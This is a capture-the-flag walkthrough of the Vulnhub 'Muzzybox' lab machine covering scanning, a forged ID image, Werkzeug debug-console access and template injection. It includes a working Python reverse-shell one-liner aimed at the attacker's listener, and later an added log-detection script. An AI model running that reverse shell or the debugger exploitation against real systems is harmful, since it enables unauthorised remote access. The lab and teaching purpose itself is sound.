Muzzybox
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ff:33:41 1 60 PCS Systemtechnik GmbH
192.168.56.242 08:00:27:6c:2c:5b 1 60 PCS Systemtechnik GmbH
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.242.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.242 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-03 22:06 EDT
Nmap scan report for bogon (192.168.56.242)
Host is up (0.00015s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:3c:05:11:e0:2a:5a:34:bf:95:4c:59:0e:86:81:4f (RSA)
| 256 a7:65:d3:5b:e7:9d:56:ad:e4:a9:87:d9:2d:ae:3a:c3 (ECDSA)
|_ 256 d5:7e:21:b6:3f:f3:24:7a:2f:b7:b6:6e:59:43:dd:73 (ED25519)
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
3000/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: Muzzy CTF
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
8989/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: TypeError: The view function did not return a valid response. ...
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
9633/tcp open http SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
15000/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: 404 Not Found
MAC Address: 08:00:27:6C:2C:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds
Challenge 1
Browse to port 80 and read the usage guide for this target machine:
In addition, you can use this id card for reference. Click_Here OR got to http://{ip}:9633/idcard.png Note: Don't upload this file directly, edit with your name and upload it's screenshot.
Download the image to the local Kali Linux machine:
http://192.168.56.242:9633/idcard.png
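The image then needs to be edited with an image editor. The author's hint says that only the principal is authorized, so "student" must be changed to "principal".
Then upload it at 192.168.56.242:3000.
Challenge 2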
After the data breach University has developed the new website, but somehow it is still under maintenance. Can you able to list the current directory and read the flag file.
Link: http://{IP}:8989/
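Browsing to port 8989 returns an error page. However, there is a clickable element to the right of the error, which opens a pop-up window:
The PIN requested here is the number 123456789 from Challenge 1; after entering it, a Python runtime environment (console) appears.
First, start an nc listener on Kali Linux.
Then run the following in the Python console on the target machine: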
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.230",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
This gives Kali Linux a shell returned from the target machine:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.242] 58360
192.168.56.230 - - [04/Apr/2023 08:06:18] "GET /?__debugger__=yes&cmd=os.dup2(s.fileno()%2C2)&frm=140383158195424&s=8ywYwr8xuss2AXZJi1Os HTTP/1.1" 200 -
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
webpy@muzzy:~$ ls -alh
ls -alh
total 32K
drwx------ 4 webpy webpy 4.0K Feb 25 2020 .
drwxr-xr-x 7 root root 4.0K Feb 25 2020 ..
-rwx------ 1 webpy webpy 381 Feb 25 2020 .bash_history
-rwx------ 1 webpy webpy 3.7K Feb 25 2020 .bashrc
drwx------ 2 webpy webpy 4.0K Feb 25 2020 flag
drwx------ 3 webpy webpy 4.0K Feb 25 2020 .local
-rwx------ 1 webpy webpy 807 Feb 25 2020 .profile
-rwx------ 1 webpy webpy 66 Feb 25 2020 .selected_editor
webpy@muzzy:~$ cd flag
cd flag
webpy@muzzy:~/flag$ ls -alh
ls -alh
total 12K
drwx------ 2 webpy webpy 4.0K Feb 25 2020 .
drwx------ 4 webpy webpy 4.0K Feb 25 2020 ..
-rwx------ 1 webpy webpy 490 Feb 25 2020 ctf2.py
webpy@muzzy:~/flag$ cat ctf2.py
cat ctf2.py
import os
from flask import Flask
app = Flask(__name__)
@app.route('/')
def aws_console():
    print("Welcome to the Muzzy's World")
if __name__ == '__main__':
    # os.environ['WERKZEUG_DEBUG_PIN'] = 'off'
    # os.environ.set('WERKZEUG_DEBUG_PIN') = 'Muzzy'
    # app.secret_key = '123-456-789'
    os.environ['WERKZEUG_DEBUG_PIN'] = '123-456-789'
    app.config['FLAG'] = 'N$cTF{R34D_F!L3_/home/webssti/noflag.txt}'
    app.run(host='0.0.0.0', port=8989, debug=True, threaded=True)
This yields the second flag:
N$cTF{R34D_F!L3_/home/webssti/noflag.txt}
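The access-log line captured in the listener output above shows what console use looks like on the server side: a request carrying __debugger__=yes, cmd, frm and s. The following detection sketch is an added example, not part of the original write-up or the target's code; it classifies Werkzeug debugger requests in access logs. The first sample line is the one from this page, the others are constructed, and the kind labels are names chosen here.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Werkzeug dev-server access log: ip - - [timestamp] "METHOD target HTTP/x" status -
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3}')

# Debugger sub-commands that do not evaluate code in a traceback frame.
NON_EVAL = {"resource": "debugger-asset", "pinauth": "pin-attempt",
            "printpin": "pin-print"}


def classify(line):
    """Return (ip, timestamp, kind, detail) for a debugger request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if query.get("__debugger__", [""])[0] != "yes":
        return None
    cmd = query.get("cmd", [""])[0]
    if cmd in NON_EVAL:
        return m["ip"], m["ts"], NON_EVAL[cmd], ""
    if cmd and "frm" in query:
        # cmd holds Python source evaluated in frame frm: code ran in the app process.
        return m["ip"], m["ts"], "console-exec", cmd
    return m["ip"], m["ts"], "debugger-other", cmd


def scan(lines):
    """Keep only the lines that touched the debugger."""
    return [hit for hit in map(classify, lines) if hit]


SAMPLE_LOG = [
    # Line taken from the listener output on this page.
    '192.168.56.230 - - [04/Apr/2023 08:06:18] "GET /?__debugger__=yes&cmd=os.dup2(s.fileno()%2C2)&frm=140383158195424&s=8ywYwr8xuss2AXZJi1Os HTTP/1.1" 200 -',
    # Constructed lines: a PIN submission, a debugger asset fetch, a normal request.
    '192.168.56.230 - - [04/Apr/2023 08:05:40] "GET /?__debugger__=yes&cmd=pinauth&pin=PLACEHOLDER&s=PLACEHOLDER HTTP/1.1" 200 -',
    '192.168.56.230 - - [04/Apr/2023 08:05:39] "GET /?__debugger__=yes&cmd=resource&f=debugger.js HTTP/1.1" 200 -',
    '192.168.56.230 - - [04/Apr/2023 08:05:38] "GET / HTTP/1.1" 500 -',
]

if __name__ == "__main__":
    for ip, ts, kind, detail in scan(SAMPLE_LOG):
        print(ts, ip, kind, detail)
```

Any console-exec hit means Python supplied by the client ran with the application's privileges. The root cause in ctf2.py is debug=True on a server bound to 0.0.0.0, combined with a fixed WERKZEUG_DEBUG_PIN.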
Challenge 3
http://192.168.56.242:15000/page?name=jason
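When we submit different name values, the page returns content containing the submitted value, so this port has a template injection vulnerability.
The tplmap tool can be used.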
From: https://www.cnblogs.com/jason-huawen/p/17285797.html